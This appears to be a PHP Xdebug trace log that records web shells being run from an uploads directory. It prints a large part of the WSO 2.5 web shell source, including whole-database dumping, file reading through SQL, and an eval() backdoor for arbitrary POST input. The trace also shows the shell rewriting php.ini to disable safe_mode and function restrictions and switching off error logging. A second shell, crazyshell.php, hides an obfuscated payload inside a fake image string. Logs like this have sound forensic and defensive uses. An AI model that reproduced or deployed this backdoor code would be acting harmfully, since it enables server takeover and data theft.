information_schema.tables where table_schema != \'information_schema\' AND table_schema != \'pg_catalog\'");\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction error() {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\treturn @mysql_error();\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn @pg_last_error();\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction setCharset($str) {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\tif(function_exists(\'mysql_set_charset\'))\r\n\t\t\t\t\t\treturn @mysql_set_charset($str, $this->link);\r\n\t\t\t\t\telse\r\n\t\t\t\t\t\t$this->query(\'SET CHARSET \'.$str);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn @pg_set_client_encoding($this->link, $str);\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction loadFile($str) {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\treturn $this->fetch($this->query("SELECT LOAD_FILE(\'".addslashes($str)."\') as file"));\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\t$this->query("CREATE TABLE wso2(file text);COPY wso2 FROM \'".addslashes($str)."\';select file from wso2;");\r\n\t\t\t\t\t$r=array();\r\n\t\t\t\t\twhile($i=$this->fetch())\r\n\t\t\t\t\t\t$r[] = $i[\'file\'];\r\n\t\t\t\t\t$this->query(\'drop table wso2\');\r\n\t\t\t\t\treturn array(\'file\'=>implode("\\n",$r));\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction dump($table, $fp = false) {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\t$res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');\r\n\t\t\t\t\t$create = mysql_fetch_array($res);\r\n\t\t\t\t\t$sql = $create[1].";\\n";\r\n if($fp) fwrite($fp, $sql); else echo($sql);\r\n\t\t\t\t\t$this->query(\'SELECT * FROM `\'.$table.\'`\');\r\n $i = 0;\r\n $head = true;\r\n\t\t\t\t\twhile($item = $this->fetch()) {\r\n $sql = \'\';\r\n if($i % 1000 == 0) {\r\n $head = true;\r\n $sql = ";\\n\\n";\r\n }\r\n\r\n\t\t\t\t\t\t$columns = array();\r\n\t\t\t\t\t\tforeach($item as $k=>$v) {\r\n if($v === null)\r\n $item[$k] = "NULL";\r\n elseif(is_int($v))\r\n $item[$k] = $v;\r\n else\r\n $item[$k] = "\'".@mysql_real_escape_string($v)."\'";\r\n\t\t\t\t\t\t\t$columns[] = "`".$k."`";\r\n\t\t\t\t\t\t}\r\n if($head) {\r\n $sql .= \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).") VALUES \\n\\t(".implode(", ", $item).\')\';\r\n $head = false;\r\n } else\r\n $sql .= "\\n\\t,(".implode(", ", $item).\')\';\r\n if($fp) fwrite($fp, $sql); else echo($sql);\r\n $i++;\r\n\t\t\t\t\t}\r\n if(!$head)\r\n if($fp) fwrite($fp, ";\\n\\n"); else echo(";\\n\\n");\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\t$this->query(\'SELECT * FROM \'.$table);\r\n\t\t\t\t\twhile($item = $this->fetch()) {\r\n\t\t\t\t\t\t$columns = array();\r\n\t\t\t\t\t\tforeach($item as $k=>$v) {\r\n\t\t\t\t\t\t\t$item[$k] = "\'".addslashes($v)."\'";\r\n\t\t\t\t\t\t\t$columns[] = $k;\r\n\t\t\t\t\t\t}\r\n $sql = \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\'."\\n";\r\n if($fp) fwrite($fp, $sql); else echo($sql);\r\n\t\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t};\r\n\t$db = new DbClass($_POST[\'type\']);\r\n\tif((@$_POST[\'p2\']==\'download\') && (@$_POST[\'p1\']!=\'select\')) {\r\n\t\t$db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);\r\n\t\t$db->selectdb($_POST[\'sql_base\']);\r\n switch($_POST[\'charset\']) {\r\n case "Windows-1251": $db->setCharset(\'cp1251\'); break;\r\n case "UTF-8": $db->setCharset(\'utf8\'); break;\r\n case "KOI8-R": $db->setCharset(\'koi8r\'); break;\r\n case "KOI8-U": $db->setCharset(\'koi8u\'); break;\r\n case "cp866": $db->setCharset(\'cp866\'); break;\r\n }\r\n if(empty($_POST[\'file\'])) {\r\n ob_start("ob_gzhandler", 4096);\r\n header("Content-Disposition: attachment; filename=dump.sql");\r\n header("Content-Type: text/plain");\r\n foreach($_POST[\'tbl\'] as $v)\r\n\t\t\t\t$db->dump($v);\r\n exit;\r\n } elseif($fp = @fopen($_POST[\'file\'], \'w\')) {\r\n foreach($_POST[\'tbl\'] as $v)\r\n $db->dump($v, $fp);\r\n fclose($fp);\r\n unset($_POST[\'p2\']);\r\n } else\r\n die(\'<script>alert("Error! Can\\\'t open file");window.history.back(-1)</script>\');\r\n\t}\r\n\twsoHeader();\r\n\techo "\r\n<h1>Sql browser</h1><div class=content>\r\n<form name=\'sf\' method=\'post\' onsubmit=\'fs(this);\'><table cellpadding=\'2\' cellspacing=\'0\'><tr>\r\n<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>\r\n<input type=hidden name=a value=Sql><input type=hidden name=p1 value=\'query\'><input type=hidden name=p2 value=\'\'><input type=hidden name=c value=\'". htmlspecialchars($GLOBALS[\'cwd\']) ."\'><input type=hidden name=charset value=\'". (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\') ."\'>\r\n<td><select name=\'type\'><option value=\'mysql\' ";\r\n if(@$_POST[\'type\']==\'mysql\')echo \'selected\';\r\necho ">MySql</option><option value=\'pgsql\' ";\r\nif(@$_POST[\'type\']==\'pgsql\')echo \'selected\';\r\necho ">PostgreSql</option></select></td>\r\n<td><input type=text name=sql_host value=\\"". (empty($_POST[\'sql_host\'])?\'localhost\':htmlspecialchars($_POST[\'sql_host\'])) ."\\"></td>\r\n<td><input type=text name=sql_login value=\\"". (empty($_POST[\'sql_login\'])?\'root\':htmlspecialchars($_POST[\'sql_login\'])) ."\\"></td>\r\n<td><input type=text name=sql_pass value=\\"". (empty($_POST[\'sql_pass\'])?\'\':htmlspecialchars($_POST[\'sql_pass\'])) ."\\"></td><td>";\r\n\t$tmp = "<input type=text name=sql_base value=\'\'>";\r\n\tif(isset($_POST[\'sql_host\'])){\r\n\t\tif($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) {\r\n\t\t\tswitch($_POST[\'charset\']) {\r\n\t\t\t\tcase "Windows-1251": $db->setCharset(\'cp1251\'); break;\r\n\t\t\t\tcase "UTF-8": $db->setCharset(\'utf8\'); break;\r\n\t\t\t\tcase "KOI8-R": $db->setCharset(\'koi8r\'); break;\r\n\t\t\t\tcase "KOI8-U": $db->setCharset(\'koi8u\'); break;\r\n\t\t\t\tcase "cp866": $db->setCharset(\'cp866\'); break;\r\n\t\t\t}\r\n\t\t\t$db->listDbs();\r\n\t\t\techo "<select name=sql_base><option value=\'\'></option>";\r\n\t\t\twhile($item = $db->fetch()) {\r\n\t\t\t\tlist($key, $value) = each($item);\r\n\t\t\t\techo \'<option value="\'.$value.\'" \'.($value==$_POST[\'sql_base\']?\'selected\':\'\').\'>\'.$value.\'</option>\';\r\n\t\t\t}\r\n\t\t\techo \'</select>\';\r\n\t\t}\r\n\t\telse echo $tmp;\r\n\t}else\r\n\t\techo $tmp;\r\n\techo "</td>\r\n\t\t\t\t<td><input type=submit value=\'>>\' onclick=\'fs(d.sf);\'></td>\r\n <td><input type=checkbox name=sql_count value=\'on\'" . (empty($_POST[\'sql_count\'])?\'\':\' checked\') . "> count the number of rows</td>\r\n\t\t\t</tr>\r\n\t\t</table>\r\n\t\t<script>\r\n s_db=\'".@addslashes($_POST[\'sql_base\'])."\';\r\n function fs(f) {\r\n if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\r\n if(f.p1) f.p1.value=\'\';\r\n if(f.p2) f.p2.value=\'\';\r\n if(f.p3) f.p3.value=\'\';\r\n }\r\n }\r\n\t\t\tfunction st(t,l) {\r\n\t\t\t\td.sf.p1.value = \'select\';\r\n\t\t\t\td.sf.p2.value = t;\r\n if(l && d.sf.p3) d.sf.p3.value = l;\r\n\t\t\t\td.sf.submit();\r\n\t\t\t}\r\n\t\t\tfunction is() {\r\n\t\t\t\tfor(i=0;i<d.sf.elements[\'tbl[]\'].length;++i)\r\n\t\t\t\t\td.sf.elements[\'tbl[]\'][i].checked = !d.sf.elements[\'tbl[]\'][i].checked;\r\n\t\t\t}\r\n\t\t</script>";\r\n\tif(isset($db) && $db->link){\r\n\t\techo "<br/><table width=100% cellpadding=2 cellspacing=0>";\r\n\t\t\tif(!empty($_POST[\'sql_base\'])){\r\n\t\t\t\t$db->selectdb($_POST[\'sql_base\']);\r\n\t\t\t\techo "<tr><td width=1 style=\'border-top:2px solid #666;\'><span>Tables:</span><br><br>";\r\n\t\t\t\t$tbls_res = $db->listTables();\r\n\t\t\t\twhile($item = $db->fetch($tbls_res)) {\r\n\t\t\t\t\tlist($key, $value) = each($item);\r\n if(!empty($_POST[\'sql_count\']))\r\n $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\'));\r\n\t\t\t\t\t$value = htmlspecialchars($value);\r\n\t\t\t\t\techo "<nobr><input type=\'checkbox\' name=\'tbl[]\' value=\'".$value."\'> <a href=# onclick=\\"st(\'".$value."\',1)\\">".$value."</a>" . (empty($_POST[\'sql_count\'])?\' \':" <small>({$n[\'n\']})</small>") . "</nobr><br>";\r\n\t\t\t\t}\r\n\t\t\t\techo "<input type=\'checkbox\' onclick=\'is();\'> <input type=button value=\'Dump\' onclick=\'document.sf.p2.value=\\"download\\";document.sf.submit();\'><br>File path:<input type=text name=file value=\'dump.sql\'></td><td style=\'border-top:2px solid #666;\'>";\r\n\t\t\t\tif(@$_POST[\'p1\'] == \'select\') {\r\n\t\t\t\t\t$_POST[\'p1\'] = \'query\';\r\n $_POST[\'p3\'] = $_POST[\'p3\']?$_POST[\'p3\']:1;\r\n\t\t\t\t\t$db->query(\'SELECT COUNT(*) as n FROM \' . $_POST[\'p2\']);\r\n\t\t\t\t\t$num = $db->fetch();\r\n\t\t\t\t\t$pages = ceil($num[\'n\'] / 30);\r\n echo "<script>d.sf.onsubmit=function(){st(\\"" . $_POST[\'p2\'] . "\\", d.sf.p3.value)}</script><span>".$_POST[\'p2\']."</span> ({$num[\'n\']} records) Page # <input type=text name=\'p3\' value=" . ((int)$_POST[\'p3\']) . ">";\r\n echo " of $pages";\r\n if($_POST[\'p3\'] > 1)\r\n echo " <a href=# onclick=\'st(\\"" . $_POST[\'p2\'] . \'", \' . ($_POST[\'p3\']-1) . ")\'>< Prev</a>";\r\n if($_POST[\'p3\'] < $pages)\r\n echo " <a href=# onclick=\'st(\\"" . $_POST[\'p2\'] . \'", \' . ($_POST[\'p3\']+1) . ")\'>Next ></a>";\r\n $_POST[\'p3\']--;\r\n\t\t\t\t\tif($_POST[\'type\']==\'pgsql\')\r\n\t\t\t\t\t\t$_POST[\'p2\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30);\r\n\t\t\t\t\telse\r\n\t\t\t\t\t\t$_POST[\'p2\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\';\r\n\t\t\t\t\techo "<br><br>";\r\n\t\t\t\t}\r\n\t\t\t\tif((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p2\'])) {\r\n\t\t\t\t\t$db->query(@$_POST[\'p2\']);\r\n\t\t\t\t\tif($db->res !== false) {\r\n\t\t\t\t\t\t$title = false;\r\n\t\t\t\t\t\techo \'<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">\';\r\n\t\t\t\t\t\t$line = 1;\r\n\t\t\t\t\t\twhile($item = $db->fetch())\t{\r\n\t\t\t\t\t\t\tif(!$title)\t{\r\n\t\t\t\t\t\t\t\techo \'<tr>\';\r\n\t\t\t\t\t\t\t\tforeach($item as $key => $value)\r\n\t\t\t\t\t\t\t\t\techo \'<th>\'.$key.\'</th>\';\r\n\t\t\t\t\t\t\t\treset($item);\r\n\t\t\t\t\t\t\t\t$title=true;\r\n\t\t\t\t\t\t\t\techo \'</tr><tr>\';\r\n\t\t\t\t\t\t\t\t$line = 2;\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\techo \'<tr class="l\'.$line.\'">\';\r\n\t\t\t\t\t\t\t$line = $line==1?2:1;\r\n\t\t\t\t\t\t\tforeach($item as $key => $value) {\r\n\t\t\t\t\t\t\t\tif($value == null)\r\n\t\t\t\t\t\t\t\t\techo \'<td><i>null</i></td>\';\r\n\t\t\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t\t\techo \'<td>\'.nl2br(htmlspecialchars($value)).\'</td>\';\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\techo \'</tr>\';\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\techo \'</table>\';\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo \'<div><b>Error:</b> \'.htmlspecialchars($db->error()).\'</div>\';\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\techo "<br></form><form onsubmit=\'d.sf.p1.value=\\"query\\";d.sf.p2.value=this.query.value;document.sf.submit();return false;\'><textarea name=\'query\' style=\'width:100%;height:100px\'>";\r\n if(!empty($_POST[\'p2\']) && ($_POST[\'p1\'] != \'loadfile\'))\r\n echo htmlspecialchars($_POST[\'p2\']);\r\n echo "</textarea><br/><input type=submit value=\'Execute\'>";\r\n\t\t\t\techo "</td></tr>";\r\n\t\t\t}\r\n\t\t\techo "</table></form><br/>";\r\n if($_POST[\'type\']==\'mysql\') {\r\n $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, \'@\', `host`) = USER() AND `File_priv` = \'y\'");\r\n if($db->fetch())\r\n echo "<form onsubmit=\'d.sf.p1.value=\\"loadfile\\";document.sf.p2.value=this.f.value;document.sf.submit();return false;\'><span>Load file</span> <input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form>";\r\n }\r\n\t\t\tif(@$_POST[\'p1\'] == \'loadfile\') {\r\n\t\t\t\t$file = $db->loadFile($_POST[\'p2\']);\r\n\t\t\t\techo \'<br/><pre class=ml1>\'.htmlspecialchars($file[\'file\']).\'</pre>\';\r\n\t\t\t}\r\n\t} else {\r\n echo htmlspecialchars($db->error());\r\n }\r\n\techo \'</div>\';\r\n\twsoFooter();\r\n}\r\n\r\nfunction actionMailTest() {\r\n\tfunction get_base_url()\r\n\t{\r\n\t\t$myurl = \'http://\'.$_SERVER[\'SERVER_NAME\'].$_SERVER[\'REQUEST_URI\'];\r\n\t\t$p = parse_url($myurl);\r\n\t\t$myname = explode("/", $p[\'path\']);\r\n\t\t$myname = $myname[count($myname) - 1];\r\n\t\t$base_url = $p[\'scheme\'].\'://\'.$p[\'host\'].str_replace($myname, "", $p[\'path\']);\r\n\t\treturn substr($base_url, 0, -1).$_SERVER[\'SCRIPT_NAME\'];\r\n\t}\r\n\tif (!function_exists(\'posix_getegid\')) {\r\n\t $user = @get_current_user();\r\n\t} else {\r\n\t $uid = @posix_getpwuid(posix_geteuid());\r\n\t $user = $uid[\'name\'];\r\n\t}\r\n\t$myurl = get_base_url();\r\n\t$from = "From: Result Doc<$user@".$_SERVER[\'HOST_NAME\'].">";\r\n\twsoHeader();\r\n\techo \'<h1>Mail Test</h1><div class=content><table><form name=em onSubmit="g(null,null,\\\'ems\\\',this.mailto.value,this.usere.value);return false;"><tr><td><span>Send to</span></td>\' . "<td><input type=text name=mailto value=><input type=hidden name=usere value=$user></td></tr>" . \'<tr><td></td><td><input type=submit value=">>"></td></tr></form></table>\';\r\n\tif (isset($_POST[\'p1\'])) {\r\n\t if ($_POST[\'p1\'] == \'ems\') {\r\n\t $from_add = $_POST[\'p3\'] . "@" . php_uname(\'n\');\r\n\t $to_add = $_POST[\'p2\'];\r\n\t $subject = "Mail Test - $myurl";\r\n\t $message = "Test Message : " . $myurl;\r\n\t $headers = "From: Mail Test <$from_add>\\r\\n";\r\n\t $headers.= "Reply-To: $from_add\\r\\n";\r\n\t $headers.= "Return-Path: $from_add\\r\\n";\r\n\t $headers.= \'X-Mailer: PHP/\' . phpversion();\r\n\t if (mail($to_add, $subject, $message, $headers)) {\r\n\t echo "Mail sent to $_POST[p2]";\r\n\t } else {\r\n\t echo "Error sending email!";\r\n\t }\r\n\t }\r\n}\r\necho \'</div><br>\';\r\nwsoFooter();\r\n}\r\n\r\nfunction actionRC() {\r\n\tif(!@$_POST[\'p1\']) {\r\n\t\t$a = array(\r\n\t\t\t"uname" => php_uname(),\r\n\t\t\t"php_version" => phpversion(),\r\n\t\t\t"wso_version" => WSO_VERSION,\r\n\t\t\t"safemode" => @ini_get(\'safe_mode\')\r\n\t\t);\r\n\t\techo serialize($a);\r\n\t} else {\r\n\t\teval($_POST[\'p1\']);\r\n\t}\r\n}\r\nif( empty($_POST[\'a\']) )\r\n\tif(isset($default_action) && function_exists(\'action\' . $default_action))\r\n\t\t$_POST[\'a\'] = $default_action;\r\n\telse\r\n\t\t$_POST[\'a\'] = \'SecInfo\';\r\nif( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) )\r\n\tcall_user_func(\'action\' . $_POST[\'a\']);\r\nexit;\r\n' /var/www/html/uploads/masters.php 64 0
2 A /var/www/html/uploads/masters.php(64) : eval()'d code 6 $ini = 'safe_mode=off\ndisable_functions=\nupload_max_filesize = 10M\npost_max_size = 10M'
3 15 0 0.006455 1001840 fopen 0 /var/www/html/uploads/masters.php(64) : eval()'d code 7 2 'php.ini' 'w'
3 15 1 0.006522 1002472
3 15 R resource(4) of type (stream)
2 A /var/www/html/uploads/masters.php(64) : eval()'d code 7 $ht = resource(4) of type (stream)
3 16 0 0.006555 1002400 fwrite 0 /var/www/html/uploads/masters.php(64) : eval()'d code 9 2 resource(4) of type (stream) 'safe_mode=off\ndisable_functions=\nupload_max_filesize = 10M\npost_max_size = 10M'
3 16 1 0.006585 1002464
3 16 R 78
3 17 0 0.006599 1002400 fclose 0 /var/www/html/uploads/masters.php(64) : eval()'d code 10 1 resource(4) of type (stream)
3 17 1 0.006617 1002008
3 17 R TRUE
2 A /var/www/html/uploads/masters.php(64) : eval()'d code 60 $color = '#00ff00'
2 A /var/www/html/uploads/masters.php(64) : eval()'d code 61 $default_action = 'FilesMan'
2 A /var/www/html/uploads/masters.php(64) : eval()'d code 62 $default_use_ajax = TRUE
2 A /var/www/html/uploads/masters.php(64) : eval()'d code 63 $default_charset = 'Windows-1251'
2 A /var/www/html/uploads/masters.php(64) : eval()'d code 66 $userAgents = [0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler']
3 18 0 0.006700 1001976 implode 0 /var/www/html/uploads/masters.php(64) : eval()'d code 67 2 '|' [0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler']
3 18 1 0.006725 1002120
3 18 R 'Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler'
3 19 0 0.006744 1002056 preg_match 0 /var/www/html/uploads/masters.php(64) : eval()'d code 67 2 '/Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler/i' 'python-requests/2.25.1'
3 19 1 0.006765 1002120
3 19 R 0
3 20 0 0.006779 1001976 ini_set 0 /var/www/html/uploads/masters.php(64) : eval()'d code 73 2 'error_log' NULL
3 20 1 0.006796 1002048
3 20 R ''
3 21 0 0.006809 1001976 ini_set 0 /var/www/html/uploads/masters.php(64) : eval()'d code 74 2 'log_errors' 0
3 21 1 0.006825 1002048
3 21 R '1'
3 22 0 0.006838 1001976 ini_set 0 /var/www/html/uploads/masters.php(64) : eval()'d code 75 2 'max_execution_time' 0
3 22 1 0.006855 1002080
3 22 R '30'
3 23 0 0.006868 1001976 set_time_limit 0 /var/www/html/uploads/masters.php(64) : eval()'d code 76 1 0
3 23 1 0.006884 1002040
3 23 R FALSE
3 24 0 0.006897 1002008 function_exists 0 /var/www/html/uploads/masters.php(64) : eval()'d code 77 1 'set_magic_quotes_runtime'
3 24 1 0.006912 1002048
3 24 R FALSE
3 25 0 0.006925 1002008 define 0 /var/www/html/uploads/masters.php(64) : eval()'d code 78 2 'WSO_VERSION' '2.5'
3 25 1 0.006940 1002112
3 25 R TRUE
3 26 0 0.006953 1002040 get_magic_quotes_gpc 0 /var/www/html/uploads/masters.php(64) : eval()'d code 80 0
3 26 1 0.006966 1002040
3 26 R FALSE
3 27 0 0.006980 1002040 md5 0 /var/www/html/uploads/masters.php(64) : eval()'d code 101 1 'localhost'
3 27 1 0.006994 1002136
3 27 R '421aa90e079fa326b6494f812ad13e79'
3 28 0 0.007011 1002040 wsoLogin 1 /var/www/html/uploads/masters.php(64) : eval()'d code 102 0
0.007057 922720
TRACE END [2023-02-12 23:21:37.293914]
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:51:42.858469]
1 0 1 0.000145 393528
1 3 0 0.000306 425064 {main} 1 /var/www/html/uploads/crazyshell.php 0 0
2 4 0 0.000324 425064 error_reporting 0 /var/www/html/uploads/crazyshell.php 17 1 0
2 4 1 0.000339 425104
2 4 R 22527
1 A /var/www/html/uploads/crazyshell.php 18 $wp_nonce = '63a9f0ea7bb98050796b649e85481845'
1 A /var/www/html/uploads/crazyshell.php 59 $wp_default_logo = '<img src="data:image/png;5X1te9s2EuBn93n6H2BWW0qNLEty0s1Kluxs4mxyTeKs7Wy3Z%tUWqQk1hKpkpQdN5v%fjODd77Ictre3j2nNpZIDAYDYDAYDAaDr7%a%e7rr7bexv7XX323#%VXX39VC6OQsQFzUm8SjBaxHwziyeQi8sPUu5oHo8kqGmdhHKWDi2i1nMeeP1p4H0eTcB6k4W8B5Oy0315EyzjNKEG%dPqAfZbBw#EkXgYRq7vL2bIF5blN99ZtQHI4qQNEg30Cmia3SZgF#NxkSBSmb03G8zill%j4GQmmXGGaBlm9Nnp%fHp27o5nwfj6duleNhpff4W4AAIJHAUfwzRL6#7tcmccR5Nw2gIK3EaDBeNZzNyfAm82m7kSs4H35OifH44Q9S%xdWDhzZJwUQLAtgfMdQFsC#G2agtshCsvDSJvAfSPTo9O%nV0cu6ePj95%f5s9PL1m6N3z94eQc4#wc9Xc8hARE#DbATUZkEEpAM'
2 5 0 0.000405 425088 preg_match 0 /var/www/html/uploads/crazyshell.php 60 3 '#<img src="data:image/png;(.*)">#' '<img src="data:image/png;5X1te9s2EuBn93n6H2BWW0qNLEty0s1Kluxs4mxyTeKs7Wy3Z%tUWqQk1hKpkpQdN5v%fjODd77Ictre3j2nNpZIDAYDYDAYDAaDr7%a%e7rr7bexv7XX323#%VXX39VC6OQsQFzUm8SjBaxHwziyeQi8sPUu5oHo8kqGmdhHKWDi2i1nMeeP1p4H0eTcB6k4W8B5Oy0315EyzjNKEG%dPqAfZbBw#EkXgYRq7vL2bIF5blN99ZtQHI4qQNEg30Cmia3SZgF#NxkSBSmb03G8zill%j4GQmmXGGaBlm9Nnp%fHp27o5nwfj6duleNhpff4W4AAIJHAUfwzRL6#7tcmccR5Nw2gIK3EaDBeNZzNyfAm82m7kSs4H35OifH44Q9S%xdWDhzZJwUQLAtgfMdQFsC#G2agtshCsvDSJvAfSPTo9O%nV0cu6ePj95%f5s9PL1m6N3z94eQc4#wc9Xc8hARE#DbATUZkEEpAM' NULL
2 5 1 0.000488 466528
2 5 R 1
1 A /var/www/html/uploads/crazyshell.php 61 $logo_image = '5X1te9s2EuBn93n6H2BWW0qNLEty0s1Kluxs4mxyTeKs7Wy3Z%tUWqQk1hKpkpQdN5v%fjODd77Ictre3j2nNpZIDAYDYDAYDAaDr7%a%e7rr7bexv7XX323#%VXX39VC6OQsQFzUm8SjBaxHwziyeQi8sPUu5oHo8kqGmdhHKWDi2i1nMeeP1p4H0eTcB6k4W8B5Oy0315EyzjNKEG%dPqAfZbBw#EkXgYRq7vL2bIF5blN99ZtQHI4qQNEg30Cmia3SZgF#NxkSBSmb03G8zill%j4GQmmXGGaBlm9Nnp%fHp27o5nwfj6duleNhpff4W4AAIJHAUfwzRL6#7tcmccR5Nw2gIK3EaDBeNZzNyfAm82m7kSs4H35OifH44Q9S%xdWDhzZJwUQLAtgfMdQFsC#G2agtshCsvDSJvAfSPTo9O%nV0cu6ePj95%f5s9PL1m6N3z94eQc4#wc9Xc8hARE#DbATUZkEEpAMiAfFbOwGINEtGSbCce2PAersc'
2 6 0 0.000540 466424 pre_term_name 1 /var/www/html/uploads/crazyshell.php 62 2 '5X1te9s2EuBn93n6H2BWW0qNLEty0s1Kluxs4mxyTeKs7Wy3Z%tUWqQk1hKpkpQdN5v%fjODd77Ictre3j2nNpZIDAYDYDAYDAaDr7%a%e7rr7bexv7XX323#%VXX39VC6OQsQFzUm8SjBaxHwziyeQi8sPUu5oHo8kqGmdhHKWDi2i1nMeeP1p4H0eTcB6k4W8B5Oy0315EyzjNKEG%dPqAfZbBw#EkXgYRq7vL2bIF5blN99ZtQHI4qQNEg30Cmia3SZgF#NxkSBSmb03G8zill%j4GQmmXGGaBlm9Nnp%fHp27o5nwfj6duleNhpff4W4AAIJHAUfwzRL6#7tcmccR5Nw2gIK3EaDBeNZzNyfAm82m7kSs4H35OifH44Q9S%xdWDhzZJwUQLAtgfMdQFsC#G2agtshCsvDSJvAfSPTo9O%nV0cu6ePj95%f5s9PL1m6N3z94eQc4#wc9Xc8hARE#DbATUZkEEpAMiAfFbOwGINEtGSbCce2PAersc' '63a9f0ea7bb98050796b649e85481845'
3 7 0 0.000577 466424 file_exists 0 /var/www/html/uploads/crazyshell.php 21 1 'index.php'
3 7 1 0.000599 466464
3 7 R FALSE
3 8 0 0.000613 466424 str_replace 0 /var/www/html/uploads/crazyshell.php 24 3 [0 => '%', 1 => '#'] [0 => '/', 1 => '+'] '5X1te9s2EuBn93n6H2BWW0qNLEty0s1Kluxs4mxyTeKs7Wy3Z%tUWqQk1hKpkpQdN5v%fjODd77Ictre3j2nNpZIDAYDYDAYDAaDr7%a%e7rr7bexv7XX323#%VXX39VC6OQsQFzUm8SjBaxHwziyeQi8sPUu5oHo8kqGmdhHKWDi2i1nMeeP1p4H0eTcB6k4W8B5Oy0315EyzjNKEG%dPqAfZbBw#EkXgYRq7vL2bIF5blN99ZtQHI4qQNEg30Cmia3SZgF#NxkSBSmb03G8zill%j4GQmmXGGaBlm9Nnp%fHp27o5nwfj6duleNhpff4W4AAIJHAUfwzRL6#7tcmccR5Nw2gIK3EaDBeNZzNyfAm82m7kSs4H35OifH44Q9S%xdWDhzZJwUQLAtgfMdQFsC#G2agtshCsvDSJvAfSPTo9O%nV0cu6ePj95%f5s9PL1m6N3z94eQc4#wc9Xc8hARE#DbATUZkEEpAMiAfFbOwGINEtGSbCce2PAersc'
3 8 1 0.000696 487000
3 8 R '5X1te9s2EuBn93n6H2BWW0qNLEty0s1Kluxs4mxyTeKs7Wy3Z/tUWqQk1hKpkpQdN5v/fjODd77Ictre3j2nNpZIDAYDYDAYDAaDr7/a/e7rr7bexv7XX323+/VXX39VC6OQsQFzUm8SjBaxHwziyeQi8sPUu5oHo8kqGmdhHKWDi2i1nMeeP1p4H0eTcB6k4W8B5Oy0315EyzjNKEG/dPqAfZbBw+EkXgYRq7vL2bIF5blN99ZtQHI4qQNEg30Cmia3SZgF+NxkSBSmb03G8zill/j4GQmmXGGaBlm9Nnp/fHp27o5nwfj6duleNhpff4W4AAIJHAUfwzRL6+7tcmccR5Nw2gIK3EaDBeNZzNyfAm82m7kSs4H35OifH44Q9S/xdWDhzZJwUQLAtgfMdQFsC+G2agtshCsvDSJvAfSPTo9O/nV0cu6ePj95/f5s9PL1m6N3z94eQc4+wc9Xc8hARE+DbATUZkEEpAMiAfFbOwGINEtGSbCce2PAersc'
